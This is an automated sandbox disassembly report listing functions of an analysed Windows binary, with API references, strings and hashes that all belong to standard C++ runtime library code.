Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3$LockitLockit::_std::_
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 2181796688-2891247106
Opcode ID: fb9efabb27d9c4904fc0f6786f4610e64a70e53a5197ccb540051ccf11cbb853
Instruction ID: eca481a22dc832a7deb893aa9aef97dfe011d12ea4d16a9ef795628b65be088c
Opcode Fuzzy Hash: fb9efabb27d9c4904fc0f6786f4610e64a70e53a5197ccb540051ccf11cbb853
Instruction Fuzzy Hash: 67C15FB2500109ABDB18DFA9C995DFF7BACBF89304F14051BFA02E6291D634DA14CB75

Function 004C5A21 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004C5A28

Part of subcall function 004A3037: __EH_prolog3.LIBCMT ref: 004A303E
Part of subcall function 004A3037: std::_Lockit::_Lockit.LIBCPMT ref: 004A3048
Part of subcall function 004A3037: int.LIBCPMT ref: 004A305F
Part of subcall function 004A3037: std::_Lockit::~_Lockit.LIBCPMT ref: 004A30B9

Strings

%b %d %H : %M : %S %Y, xrefs: 004C5CE0
:AM:am:PM:pm, xrefs: 004C5DBD
%H : %M, xrefs: 004C5B6D
%m / %d / %y, xrefs: 004C5B24
%I : %M : %S %p, xrefs: 004C5DB2
%H : %M : %S, xrefs: 004C5BE4
%d / %m / %y, xrefs: 004C5D8B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1538362411-2891247106
Opcode ID: 111530249fdb93ffa129e80ec7c4a306a3aff828defbe7433807bbf5901c4dbe
Instruction ID: 3b8faeecdd8c6d780aad6589da2323b4463c79684d09dd6eb23b8b25e0b5c101
Opcode Fuzzy Hash: 111530249fdb93ffa129e80ec7c4a306a3aff828defbe7433807bbf5901c4dbe
Instruction Fuzzy Hash: 5DC1807A500609ABDB98DF58C959FFF3BA8BF05300F04411FFA03A6251E674EA90CB65

Function 004CDD36 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 004CDE55
___TypeMatch.LIBVCRUNTIME ref: 004CDF63
_UnwindNestedFrames.LIBCMT ref: 004CE0B5
CallUnexpected.LIBVCRUNTIME ref: 004CE0D0

Strings

csm, xrefs: 004CDDE0
csm, xrefs: 004CDD73
`UR, xrefs: 004CDE4C
csm, xrefs: 004CDE8C

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: `UR$csm$csm$csm
API String ID: 2751267872-874916341
Opcode ID: a80b929888f06ded549df5ac16be590827173f411c87dda502267b982c0685ae
Instruction ID: 498afb3a03e25701d82e08f07fd6888b901da16c1cc5d936c4bce94fa6fff54e
Opcode Fuzzy Hash: a80b929888f06ded549df5ac16be590827173f411c87dda502267b982c0685ae
Instruction Fuzzy Hash: 8DB19879C00219EFCFA4DFA6C880EAEB7B5BF14314B14416FE8056B212D379DA51CB99

Function 004D1E71 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004D1E78
UnDecorator::getSymbolName.LIBCMT ref: 004D1F0A
DName::operator+.LIBCMT ref: 004D200E
DName::DName.LIBVCRUNTIME ref: 004D20B1

Part of subcall function 004CF7BA: shared_ptr.LIBCMT ref: 004CF7D6

Part of subcall function 004CFA54: DName::DName.LIBVCRUNTIME ref: 004CFAA2

Strings

(k[M, xrefs: 004D1FCB
D_R, xrefs: 004D1FDE, 004D200A
(k[M, xrefs: 004D1E9F, 004D1EA4
k[M, xrefs: 004D1FE6, 004D1EBA

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
String ID: (k[M$(k[M$D_R$k[M
API String ID: 1134295639-4232926502
Opcode ID: e9c59fc94eed3a7156cb2087bc89db50a7675dd475ba6c5960da8fafa2d0cf9b
Instruction ID: 8b3facf015973b67c8ff627d9c4cc3a737bee669d632b382b9f9c9a421694a81
Opcode Fuzzy Hash: e9c59fc94eed3a7156cb2087bc89db50a7675dd475ba6c5960da8fafa2d0cf9b
Instruction Fuzzy Hash: 06717B72D002099FEB11CF90D965BEEBBB4AB18315F18402FEA05BB351D7789909DF68

Function 004D0C83 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 151COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 004D0D11
DName::operator+.LIBCMT ref: 004D0D64

Part of subcall function 004CF7BA: shared_ptr.LIBCMT ref: 004CF7D6

Part of subcall function 004CF6A9: DName::operator+.LIBCMT ref: 004CF6CA

DName::operator+.LIBCMT ref: 004D0D55
DName::operator+.LIBCMT ref: 004D0DB5
DName::operator+.LIBCMT ref: 004D0DC2
DName::operator+.LIBCMT ref: 004D0E09
DName::operator+.LIBCMT ref: 004D0E16

Strings

\cR, xrefs: 004D0DF8, 004D0E02

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name::operator+$shared_ptr
String ID: \cR
API String ID: 1037112749-1364330106
Opcode ID: 2372e06cb4ed6c9b2f569ced9569eb5caebdf6a8677f61a7588f7ce1c559eb98
Instruction ID: 1ed8bba231764a278ad1e877bf15aa8e162e1a3892b77d1099c17f161dc1465a
Opcode Fuzzy Hash: 2372e06cb4ed6c9b2f569ced9569eb5caebdf6a8677f61a7588f7ce1c559eb98
Instruction Fuzzy Hash: 3A519675900208ABDF15DBE5D855FEFBBB9AF08314F04402FF505A7281DB78AA48CBA4

Function 004D2241 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 004D2274

Part of subcall function 004CF77E: DName::operator+=.LIBCMT ref: 004CF794

Strings

(cR, xrefs: 004D2361
pbR, xrefs: 004D23C0, 004D23C8
bR, xrefs: 004D2256
pbR, xrefs: 004D22CA, 004D23D9, 004D23E3, 004D226F

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name::operator+Name::operator+=
String ID: (cR$pbR$pbR$bR
API String ID: 382699925-1096605505
Opcode ID: d075cf432881c158c22c3de9345e3b5abdc4c457772738863c2fede92951945c
Instruction ID: e39e951676ff6d9a4bebe5ee8dc00352301de13670a7c0100cb663451c72795f
Opcode Fuzzy Hash: d075cf432881c158c22c3de9345e3b5abdc4c457772738863c2fede92951945c
Instruction Fuzzy Hash: 64418F75C0021A9BCF00CFA9E565AEEBBB4BF25304F10445BE905B7350D7BC9A49DBA8

Function 004D55A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 004D55E4
DName::operator+.LIBCMT ref: 004D55F0

Part of subcall function 004CF7BA: shared_ptr.LIBCMT ref: 004CF7D6

DName::operator+=.LIBCMT ref: 004D56AE

Part of subcall function 004D3E34: DName::operator+.LIBCMT ref: 004D3E9F
Part of subcall function 004D3E34: DName::operator+.LIBCMT ref: 004D4169

Part of subcall function 004CF6A9: DName::operator+.LIBCMT ref: 004CF6CA

DName::operator+.LIBCMT ref: 004D566B

Part of subcall function 004CF812: DName::operator=.LIBVCRUNTIME ref: 004CF833

DName::DName.LIBVCRUNTIME ref: 004D56D2
DName::operator+.LIBCMT ref: 004D56DE

Strings

k[M, xrefs: 004D55AC
pcR, xrefs: 004D5692

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID: k[M$pcR
API String ID: 2795783184-1659108136
Opcode ID: b1d441399290531b390c5146873e104de6af46cfeafca5971ebbe1a2f1210d20
Instruction ID: f87071c2766072e84514b6f9c8d3f7c4e72af8615d2a2a1ec8eafc6482c70f41
Opcode Fuzzy Hash: b1d441399290531b390c5146873e104de6af46cfeafca5971ebbe1a2f1210d20
Instruction Fuzzy Hash: D94128B4A002046FEB14DF64C865BAE7BFAAB19304F40445FE14AD7391DB3C9D49CB18

Function 004BA024 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004BA02B
_Maklocstr.LIBCPMT ref: 004BA094
_Maklocstr.LIBCPMT ref: 004BA0A6
_Getvals.LIBCPMT ref: 004BA0F0

Strings

04R, xrefs: 004BA06F
false, xrefs: 004BA08F
true, xrefs: 004BA0A1
<VK, xrefs: 004BA04B, 004BA08A, 004BA09C, 004BA0DF, 004BA0B7, 004BA0C7, 004BA08D, 004BA09F, 004BA0BA, 004BA0CA

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Maklocstr$GetvalsH_prolog3_
String ID: 04R$<VK$false$true
API String ID: 1611767717-4170894433
Opcode ID: 23f5ae74604ef8b7a4f1d3447a0e2812c68f8929ee1582f696d65d3d61fc0cbe
Instruction ID: 88c6ff05c9278b3db4de30a3ecdb6fb8e4a93b6a9c08aa96d9ed21d3fd235c5d
Opcode Fuzzy Hash: 23f5ae74604ef8b7a4f1d3447a0e2812c68f8929ee1582f696d65d3d61fc0cbe
Instruction Fuzzy Hash: 3F21A172C00318AADF14EFA5D845ADF7FA8EF05754F00805BB9089F292DB789950CBB5

Function 004BA0FD Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004BA104
_Maklocstr.LIBCPMT ref: 004BA16B
_Maklocstr.LIBCPMT ref: 004BA17D
_Maklocchr.LIBCPMT ref: 004BA195
_Maklocchr.LIBCPMT ref: 004BA1A5

Strings

false, xrefs: 004BA166
true, xrefs: 004BA178
04R, xrefs: 004BA144

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: MaklocchrMaklocstr$H_prolog3_
String ID: 04R$false$true
API String ID: 2404127365-642619426
Opcode ID: 101a3279ed17fa1a66ad336e9086cdd7350daee5c51dcd6178a2534681a03498
Instruction ID: 11a62fcf66f03a1f7205b679eb993a365890a3976e213dd1da4e3e4fc608a74b
Opcode Fuzzy Hash: 101a3279ed17fa1a66ad336e9086cdd7350daee5c51dcd6178a2534681a03498
Instruction Fuzzy Hash: 1A216B71C00348AADF14EFA6D8859DBBBB8EF45704F00845FF9159F292EA789940CB75

Function 004AAD31 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004AAD37
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 004AAD45
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004AAD56
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004AAD67

Strings

kernel32.dll, xrefs: 004AAD32
GetCurrentPackageId, xrefs: 004AAD3F
GetTempPath2W, xrefs: 004AAD5C
GetSystemTimePreciseAsFileTime, xrefs: 004AAD4B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 068308c56fe0c4d40cd33348400c8d4d8786b5aa03920f8d1e60a16f2c69e71a
Instruction ID: 605ea035cf629e61db546b4cdf5488f9a01568aa8be111704ad5b23331d926c9
Opcode Fuzzy Hash: 068308c56fe0c4d40cd33348400c8d4d8786b5aa03920f8d1e60a16f2c69e71a
Instruction Fuzzy Hash: 78E0B6726A13A0ABD3115B74BC1D8553EE8FE277023020866F501D31E0D7784509AFA0

Function 00509288 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00509501

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 00a8425092b1afbdf06a0ea36c0088ac7659c0798631a30cf41156f8f3a722bd
Instruction ID: e36d6ea35077e463938734271891774b39c096a8f7ffe0b88fd8021f745d887f
Opcode Fuzzy Hash: 00a8425092b1afbdf06a0ea36c0088ac7659c0798631a30cf41156f8f3a722bd
Instruction Fuzzy Hash: 57B1F0B0A04209AFDB12DF99C891BAEBFB2BF95304F144199E404AB3D7C7759D42CB61

Function 004D41F2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004D56F4: Replicator::operator[].LIBCMT ref: 004D5731

DName::operator=.LIBVCRUNTIME ref: 004D429E

Part of subcall function 004D3E34: DName::operator+.LIBCMT ref: 004D3E9F
Part of subcall function 004D3E34: DName::operator+.LIBCMT ref: 004D4169

DName::operator+.LIBCMT ref: 004D4258
DName::operator+.LIBCMT ref: 004D4264
DName::DName.LIBVCRUNTIME ref: 004D42A8
DName::operator+.LIBCMT ref: 004D42C5
DName::operator+.LIBCMT ref: 004D42D1

Strings

D_R, xrefs: 004D42B0

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID: D_R
API String ID: 955152517-815041869
Opcode ID: 08eb8aca5fe408d51de4dc3c5709c31f8d5fe55ada058229c4b9bca5ca0b7a30
Instruction ID: daa26f6841b6ad2322124d4a13f7162e28e1f921075c03e8cb687c9c2e28b8de
Opcode Fuzzy Hash: 08eb8aca5fe408d51de4dc3c5709c31f8d5fe55ada058229c4b9bca5ca0b7a30
Instruction Fuzzy Hash: D531D2B4A002049FDB14CF54D465AAABBF9AF99344F14846FE58AA7391D7389908CB18

Function 004A9023 Relevance: 12.2, APIs: 8, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004A902A
ctype.LIBCPMT ref: 004A9065

Part of subcall function 004A323C: __Getctype.LIBCPMT ref: 004A325A

int.LIBCPMT ref: 004A9045

Part of subcall function 004A3725: std::_Lockit::_Lockit.LIBCPMT ref: 004A3736
Part of subcall function 004A3725: std::_Lockit::~_Lockit.LIBCPMT ref: 004A3750

int.LIBCPMT ref: 004A909B
int.LIBCPMT ref: 004A90E0
int.LIBCPMT ref: 004A9123
int.LIBCPMT ref: 004A9194
_Yarn.LIBCPMT ref: 004A9212

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$GetctypeH_prolog3Lockit::_Lockit::~_Yarnctype
String ID:
API String ID: 3791098577-0
Opcode ID: 3ef2a5e80c4162988bf0bab5bfb08470c080c1d9ac1f30c75eece79448dc3d4a
Instruction ID: 9be0265d21e2cd6fa0b966d2e578f6aaaa31ed8a0daf1e15b41ff5a2be3efed1
Opcode Fuzzy Hash: 3ef2a5e80c4162988bf0bab5bfb08470c080c1d9ac1f30c75eece79448dc3d4a
Instruction Fuzzy Hash: B951A4B1905216AAFB116F628C86A7F7AA8FF73354F04441FF90556241FF3C8E0197AA

Function 004B0864 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004B086B
_strcspn.LIBCMT ref: 004B08D9
_strcspn.LIBCMT ref: 004B08F9
ctype.LIBCPMT ref: 004B0969

Strings

GR, xrefs: 004B08B8
GR, xrefs: 004B08AE

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID: GR$GR
API String ID: 838279627-184413986
Opcode ID: 0702926d73a949b5e3b860a896bc5f34c0b2ad6b1ed1a41159d08e3989c52dbf
Instruction ID: 69470f6f03a481a0c517fb290cd41614058121b431759de011caa2af19147947
Opcode Fuzzy Hash: 0702926d73a949b5e3b860a896bc5f34c0b2ad6b1ed1a41159d08e3989c52dbf
Instruction Fuzzy Hash: 97D17A75D00209AFDF14DFA4C880AEEBBB9FF08314F14451AE815AB351D738AE46CBA4

Function 004B0C0D Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004B0C14
_strcspn.LIBCMT ref: 004B0C82
_strcspn.LIBCMT ref: 004B0CA2
ctype.LIBCPMT ref: 004B0D12

Strings

GR, xrefs: 004B0C61
GR, xrefs: 004B0C57

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID: GR$GR
API String ID: 838279627-184413986
Opcode ID: fd9b40f062b92147db9122200fd5b9bb67809a185be201397cd6a4099cf404d6
Instruction ID: 439b5e954df8c0225cc95889af64d4043541af3c2d0fc04b040a631090fdf12b
Opcode Fuzzy Hash: fd9b40f062b92147db9122200fd5b9bb67809a185be201397cd6a4099cf404d6
Instruction Fuzzy Hash: 27D17971D00259AFDF14DFA8C880AEEBBB9FF08315F14451AE815AB351D738AE45CBA4

Function 004A6B7C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 343COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004A6B83
_strcspn.LIBCMT ref: 004A6BF1
_strcspn.LIBCMT ref: 004A6C11
ctype.LIBCPMT ref: 004A6C81

Strings

GR, xrefs: 004A6BC6
GR, xrefs: 004A6BD0

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID: GR$GR
API String ID: 838279627-184413986
Opcode ID: 59cc2a8c5b6dc188eb8ba300e4641dc57f25d65727d2b759e457983997402cd4
Instruction ID: e048fd7046e38c57f7437c3145f386784d7bcb694f30e5ef912185c92c05c950
Opcode Fuzzy Hash: 59cc2a8c5b6dc188eb8ba300e4641dc57f25d65727d2b759e457983997402cd4
Instruction Fuzzy Hash: 6CD19075D002599FDF14DFA4C840AEEBBB9FF2A314F19401AE815AB341D738AE45CB64

Function 004A63F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004A6406
AcquireSRWLockExclusive.KERNEL32(?,?,004A553B,?), ref: 004A6425
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,004A553B,?), ref: 004A6453
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,004A553B,?), ref: 004A64AE
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,004A553B,?), ref: 004A64C5

Strings

;UJ, xrefs: 004A647F

Memory Dump Source

